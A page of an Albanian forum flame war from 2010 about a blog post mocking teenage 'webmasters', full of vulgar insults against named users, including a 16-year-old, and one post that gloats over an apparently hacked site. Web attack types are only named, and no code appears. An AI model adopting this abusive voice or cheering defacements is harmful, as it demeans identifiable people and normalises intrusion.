Askush nuk lind i mesuar, perfshir ketu edhe une njehere e nje kohe vizitoja w3schools per te mesuar html/css dhe kur bera faqen e pare ne html ne host falas, u thoja te tjereve "shihni faqen time".
Asgje nuk eshte thene kunder ketij fenomeni?

Por problemi eshte prap qe ngaqe je shume i vogel nuk i kupton gjerat, se te kane djegur ato qe jane shkruajtur aty.
Ajo qe eshte dashur te sulmohet me kete shkrim eshte pikerisht nje faqe si e jotja me permbajtje te tipit:

"28 Nentori – Festa kombetare, na mbeten edhe pak dit deri tek dita e flamurit tone kuq e zi, te gjith te gezuar, krenar, te lumtur etj. etj. te gjithe festojn.:p"

"Shi shi shi dhe vetem shi, e tere dita vetem shi edhe ne shkoll nuk mund te shkoj rehat, po afrohet dimri, bile mbrem ka rene edhe bore.:p"

ç'fare eshte kjo, lidhja jote ne twitter lol?

Perseri nuk kupton qe ti nuk ke te drejte te japesh opinion per kete çeshtje sepse nuk di se nga lidhet gomari, e jo me te flasesh per keto fenomene qe ekspozojn mentalitetin tuaj te semure.

Njohurite e tua, si webmaster (qe paske 5 vjet ti lol) jane 0, kurse une qe po flas per kete teme, kam vite si webmaster, si administrator rrjetesh dhe ne kete moment punoj si inxhinier per sisteme UTM linux. Ku e gjen ti te drejten te flasesh dhe te japesh opinionin tend ne kete teme, apo se viziton ca larva si ast te duket vetja aker, apo se di diçka?

Gjithsesi mos te dalim shume  nga tema, ajo qe kam thene me ate qe kam shkruajtur eshte se shumica e te vetquajturve webmaster, nuk dine e para se ç'do te thote webmaster, dhe e dyta se ç'fare duhet te dije nje person qe quhet webmaster.
Injoranca normalisht u djeg disave por perseri, per mua nuk eshte ky problemi.

Problemi eshte TEMATIKA dhe ajo qe keta "webmaster" i servirin popullit shqiptar.
Ja psh si ky tipi ketu, nuk po them pse nuk jep ndihma se si te konfigurohen servera,
(http://ubuntu-virginia.ubuntuforums.org/showthread.php?t=1609907&page=4 - shih komentin e  dyte se ç'fare thote) apo te ndihmosh ne sigurimin e sistemeve (e di se ç'do te thote security?)  por problemi eshte pse i MBUSHNI FAQET TUAJA ME IDIOTIZMA?

Sot pordhi kali
neser do pjerdhi keci.
uaaaaaa
Taulanti kerkon nje moter
nje puthje per arixhiun ,
hajdari pershendet faslliun
etj etj.

Pra nuk eshte problemi vetem qe jeni ne kulmin e injorances persa i perket faqeve tuaja, nuk dini SEO, nuk dini se si te merrni vendet e para ne motorret e kerkimit.

Ja te tregoj nje rast se thoni pastaj qe nuk flet me fakte,
kerko ne google me Informatika Shqiptare dhe shiko kush del #1
por kjo nuk eshte e çuditshme  ;) me e çuditshme eshte si shpjegohet qe Informatika shqiptare nuk eshte pedoru as ne Titull dhe as ne description , as ne keywords nga "ky djali" dhe faqa eshte prap ne #1 ??????

Vazhdojm me ato qe nuk dini, nuk dini se ç'fare eshte nje SQL Injection, nje XSS, nje RFI, nje LFI dhe nuk dini as te ofroni sigurine dhe gjerat me minimale per faqen tuaj.

Por prap ky nuk eshte problemi

Problemi eshte qe perveç kesaj , ngaqe keni luajtur shume play station, ju eshte ber truri paçe pilaf, dhe tematika qe trajtoni neper keto faqet tuaja 6 mujorshe (normal se skalojn shume online) eshte nje tematik qe vetem ata gomere vizitore qe bejn postime tek ju mund ti lexonin.

Dhe prap ky eshte problemi juaj , jo i imi, por kur vjen muabeti per te dhene "gjykimet dhe analizat tuaja te vlefshme" ne tema webmasterash apo ku kerkohet vertet dije per te dhene gjykim dhe per ti pare gjerat ashtu siç jane, jeni TE PARET qe pellisni me te madhe eshte keshtu siç themi ne, e jo ashtu siç thua ti.

Po ç'fare argumenti ke sjelle lol?

Ej o acher, ty te eshte bllokuar truri, dhe jeton ne boten tende te fantazis, te pakten mbaji brenda trurit ato fantazi e mos na i sill ne te tjereve te na i shesesh per te verteta.
Ka akoma njerez me mend ne koke dhe me dije, panvarsisht se ti e urren dijen dhe i largohesh.
Do te doja shume te te pyesja se kur ka qene hera e fundit qe ke hapur nje PDF , por do te mesoja qe ti nuk di se ç'fare eshte nje pdf  :D


22
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 25-11-2010, 17:44:25 »
ti me te vertet nuk qenke normal, un nuk te thash se po te instaloj njs CMS je webmaster, un kam 5 vite qe merem me faqet dhe ende nuk i them vetes Webmaster por nejse suksese ti ne jet se do te arrish shum me keto mend qe ke, e sa per gjuh gjuhen e di mir por nuk flas me gjithkee ne gjuhen shqipe se njerezit si ti nuk kuptojn shqip. me dhimbsesh

Degjo dardanjan  ;),
nuk kam as moshe dhe as kohe per tu marr me ty, nese edhe mbas kesaj deshiron prap info apo sqarime do te sqaroj personalisht nese me dergon nje email tek adresa ime emailit.
PS: me ato qe thua je shume qesharak, shko pi qumesht e fli gjum se te ka kaluar orari.

23
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 25-11-2010, 17:20:03 »
cka di ti me shum se un? ti edhe nese je 50 vjec prap se prap mbetesh budalla, por nuk kam deshir te merrem me njerez si ti, me nje fjal per mua je nje fmi ne kals te par. poashtu edhe ti perdor WP dhe nuk ke lidhje te krijosh nje dizajn ta faqes por perdor at dizajn se frikesohesh  nga ai.

O kalama  (ne fjale te tjera), eshte e kote te flasesh me ty se ti aq ke dhe aq kupton, kujton se eshte shkenc te instalosh wordpress?
nese di te instalosh wordpress quhesh webmaster?
E ke lexuar shkrimin?
Kupton ndonje gje nga ai?
Ku e ke mesuar shqipen ne banjo?
Ti sdi te flasesh shqip, lere pastaj me pune te tjera.
une nuk jam webmaster o cop mishi me dy sy, dhe faqen 1 here ne vit e shoh per vete, e tani faqa qe thua ti eshte ne njehost ku une nuk kam as passworded dhe kam pertuar ta hedh ne host tjeter qe e kam une dhe edhe te dua skam kohe per ta bere nje gje te tille sepse nuk e kam qellimin tim te jetes faqen siç e ke ti.
E kupton tani se sa rendesi i jap une estetikes apo se ç'fare CMS-je kam instaluar?
e ke pare se sa "shpesh" postoj?
Ah pall arushe pa bisht.
Te rroft twiteri ;)
por aq tru sa ke ne koke, normal qe nuk kupton gje.
Une perpiqem qe kur kam kohe, tu jap administratoreve nje ndihme , si psh:
http://albanianwizard.org/ubuntu-10-0-4-lucid-lynx-ldap-configuration-the-working-how-to.albanianwizard

qe eshte listuar tek:
http://stackoverflow.com/questions/3687083/configure-openldap-inside-unbuntu-10-04-server-for-svn-user-and-group-administrat

http://www.openldap.org/lists/openldap-technical/201010/msg00053.html (mailing lista zyrtare e atyre qe kan bere openldap , nese e di se ç'fare eshte)

Shikoje dhe tek ubuntu.com

@gjumash, per kete skript e pate fjalen apo per te tjere qe jane ne faqe?

O dardano,
Arrin ta kuptosh tani se ç'fare kllufi je?
Apo do qe ta shpjegoj une me nga afer?

@MAX , nuk i duroj dot kalamajt qe flasin pa lidhje,  hmmmmm:


Problemi me ne shqiptaret eshte se jemi ne kulmin e injorances dhe na duket sikur jemi te ditur, flasim pa kompentenc, e pa ditur asgje , japim verdikte dhe nuk dime ti argumentojm.

Po e ka pasur mire ai qe ka thene "sbehet shqiperia me shqiptare".

24
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 25-11-2010, 16:23:34 »
Edhe se ne disa pika kritika e ketij djalit te AlbanianWizard qendron, ne pergjithesi mendoj se artikulli eshte i tepruar dhe nuk i pergjet aq shume realitetit. Te pakten gjerat nuk kane pse te shihen nga prizmi qe ky i sheh.
o o, edhe olti e paska kap me djalin, po "ky djali" u thua moshatareve?, po nese jane me te medhenj?
nejse, you'r the big boy, and the unix hax0r, ps, te shkonte me shume avatari perpara me kafken.
Ciao

25
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 25-11-2010, 16:10:03 »
Ky  Djali i Albanianwizard eshte krenar qe ka host dhe domain legal apo cfar apo eshte nje qullash :)
Artikull shume i tepruar

Hahahaha
shikoje pak indeksin e faqes, e mos thuaj se e kam bere une
http://argetohupak.com/

Citim
BAA!!!! Prap hacked ti ? Nuk more vesh ? BAAA!!!! besoj se e di kush BaBDoY ! :) Suprise.!

Kurse ky kllufi tjeter 16 vjeçar ka dardankrasniqi.word press.com
a ke mesuar ta instalosh wordpresin o WEBMASTER?
16 vjeç bytha jote me thua mua "ky djali"?

po e kuptoj se pse ju ka meriztur shkirmi se eshte tamam per ju lepurusha.

Faqe: [1] 2